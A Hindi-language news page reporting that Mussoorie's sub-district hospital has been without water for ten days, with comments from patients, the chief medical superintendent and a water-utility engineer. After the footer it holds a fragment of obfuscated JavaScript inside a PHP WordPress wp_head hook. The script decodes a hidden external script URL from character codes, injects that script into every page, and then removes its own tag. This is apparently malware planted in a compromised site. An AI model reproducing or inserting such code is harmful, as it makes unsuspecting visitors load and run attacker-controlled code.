Saturday, July 20, 2024
Google search engine
Homeउत्तराखंडमसूरी का एकमात्र सरकारी अस्पताल इन दिनों बूंद-बूंद पानी के लिये तरसा,...

मसूरी का एकमात्र सरकारी अस्पताल इन दिनों बूंद-बूंद पानी के लिये तरसा, भर्ती मरीजों ने छोडा अस्पताल

मसूरी का एकमात्र सरकारी अस्पताल इन दिनों बूंद-बूंद पानी को तरस रहा है। मसूरी में अस्पताल में पानी ना होने के कारण अस्पताल में भर्ती मरीज अस्पताल को छोड़कर जा रहे हैं यहां तक की डॉक्टर नर्स और आदि स्टाफ को भी बिना पानी के बहुत ज्यादा दिक्कत हो रही है। अस्पताल में डॉक्टर और स्टाफ बिसलेरी की बोतल खरीद कर काम चला रहे हैं। मसूरी उप जिला चिकित्सालय में गंदगी और बदबू से हाल बदहाल है जिससे लोगों को भारी परेशानियों का सामना करना पड़ रहा है अस्पताल के शौचालय गंदगी से पटे हुए हैं परंतु इस ओर कोई भी ध्यान देने को तैयार नहीं है। मसूरी उप जिला चिकित्सालय के स्टाफ और डॉक्टर का कहना है कि पिछले 10 दिनों से अस्पताल में पानी नहीं है कई बार गढ़वाल जल संस्थान को इसको लेकर शिकायत की गई है परंतु इस और कोई ध्यान नहीं दे रहा है। डॉक्टर्स का कहना है कि मसूरी का एकमात्र सरकारी अस्पताल है जहां पर रोज मसूरी और आसपास के क्षेत्र के सैकड़ों की तादाद पर मरीज आते हैं आजकल उल्टी दस्त के मरीज सबसे ज्यादा आ रहे हैं जिस वजह से पानी की खपत भी जादा हैं वही डिलीवरी केस को करने में भी दिक्कत आ रही है। उन्होंने कहा कि बिना पानी के काम करना संभव ही नहीं है। अस्पताल में भर्ती मरीज पानी के वजह से अस्पताल को छोड़कर चले गए हैं। अस्पताल में भर्ती मरीज के परिजन संदीप और मरीज रूकमणी ने बतया कि अस्पताल में पानी की बंूद तक नही है जिससे उनको और उनके मरीजों को भारी दिक्कतें पेष आई है वह वाहर से परनी खरीद कर लाये। उन्होने कहा कि अस्पताल में मूलभूत सुविधाओं का आभाव है व कई मरीज अस्पताल में पानी ना होने के कारण असपताल दोड कर दूसरे अस्पताल चले गए।

मसूरी उप जिला चिकित्सालय के सीएमएस डॉ यतेंद्र सिंह ने कहा कि अस्पताल में 10 दिनों से पानी नहीं है जिसको लेकर उनके द्वारा उच्च अधिकारियों से लेकर गढ़वाल जल संस्थान के अधिकारियों को शिकायत की गई है परंतु पानी की समस्या का हल नहीं हो पा रहा है उन्होंने कहा कि इतने बड़े अस्पताल में अगर पानी ना हो तो अस्पताल का संचालन किया जाना मुश्किल है ।उन्होंने कहा कि शिकायत के बाद षनिवार को गढ़वाल जल संस्थान के अधिकारी मौके पर पहुंचे हैं और कोशिश की जा रही है कि पानी की समस्या से निजात दिलाया जा सके परंतु पिछले 10 दिनों से अस्पताल पानी की बूंद बूंद पानी को तरस रहा था।

गढ़वाल जल संस्थान के सहायक अभियंता ने बताया कि अस्पताल में पानी की शिकायत को लेकर अधिकारियों और कर्मचारियों के साथ मौके पर पहुंचे हैं उन्होंने कहा कि अस्पताल पर अपना कोई भी पानी का रिजर्व टैंक नहीं है जिस वजह से आपातकालीन समय पर पानी की आपूर्ति टैंकरों के माध्यम से नहीं हो पाती है। उन्होंने कहा कि अस्पताल को आने वाली लाइनों को चेक किया जा रहा है और यह देखा गया है कि एक लाइन क्षतिग्रस्त है तो एक लाइन से पानी जा रहा है पर अस्पताल में पानी क्यों नहीं है इसको लेकर अस्पताल के भीतर कुछ तकनीकी दिक्कतें है जिसको अस्पताल प्रबंधन द्वारा ठीक कराया जाना है ।उन्होंने कहा कि अस्पताल में पानी ना होना चिंता विषय है और गढ़वाल जल संस्थान के द्वारा कोशिश की जा रही है के अस्पताल को जरूरत के अनुसार पानी उपलब्ध कराया जाये। उन्होंने कहा कि मसूरी में जल्द मसूरी यमुना पंपिग योजना के तहत पेयजल की सप्लाई शुरू होने जा रही है जिसके बाद मसूरी में पानी की कमी की समस्या नहीं होगी।

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>